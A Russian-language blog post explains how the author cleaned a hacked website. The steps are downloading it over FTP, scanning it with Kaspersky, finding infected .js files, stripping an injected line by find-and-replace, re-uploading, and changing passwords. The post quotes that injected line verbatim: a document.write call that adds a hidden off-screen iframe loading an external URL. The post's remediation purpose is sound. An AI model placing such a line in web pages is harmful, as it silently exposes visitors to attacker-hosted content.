Как удалить вирус с сайта?

Периодически ко мне обращаются люди, с просьбой удалить вирус с сайта. Бывает достаточно восстановить бэкап на хостинге и поменять пароли, но иногда этого не достаточно. Вот с этим «иногда» я почему-то сталкиваюсь чаще…

Для начала нам нужно установить антивирус (я поставил триальную версию Касперского), чтобы мы могли понять какие файлы заражены, а какие нет.

После скачиваем с FTP сайта к себе на компьютер весь сайт целиком.

В процессе скачивания антивирус (если он хороший) будет выявлять зараженные файлы сайта и перемещать их в карантин (если он плохой – то после полного скачивания сайта, запускаем сканирование папки на вирусы).

Когда у нас есть список зараженных файлов, а может быть даже и некоторых удаленных вирусов (которые, собственно, и заражают файлы), мы можем приступить к ручному лечению…

Я делал так:

Убирал галочки в настройках Касперского «Файловый Антивирус», «Веб Антивирус» и «Мониторинг Активности». И в списке найденных уязвимостей (отчете) – восстановил все файлы, со статусом «содержит троянскую программу: перемещено в карантин». Тем самым не давая касперычу перемещать файлы в карантин, которые я только что восстановил.

Как оказалось, все файлы — это скрипты (.js), просмотрев их код я понял, что в самой нижней строчке каждого файла прописан следующий код:

;document.write('<iframe style="position:fixed;top:0px;left:-500px;
"src="https://dvodwtkmh.qhigh.com/fb73c.lfO8n?13" height="20" width="100">
</iframe>');

Запускаю текстовый редактор с расширенным функционалом, например Sublime Text или Notepad++. Делаю «Поиск по файлам» — «Замена найденного текста» — указываю вышеуказанную строчку – и заменить на пробел.

После моей процедуры было удалено порядка 220 строчек кода. Чищу все на сервере, заливаю незараженный сайт. Меняю все пароли. Profit!

P.S. из личного опыта — большенство зараженных сайтов созданы с помощью Joomla.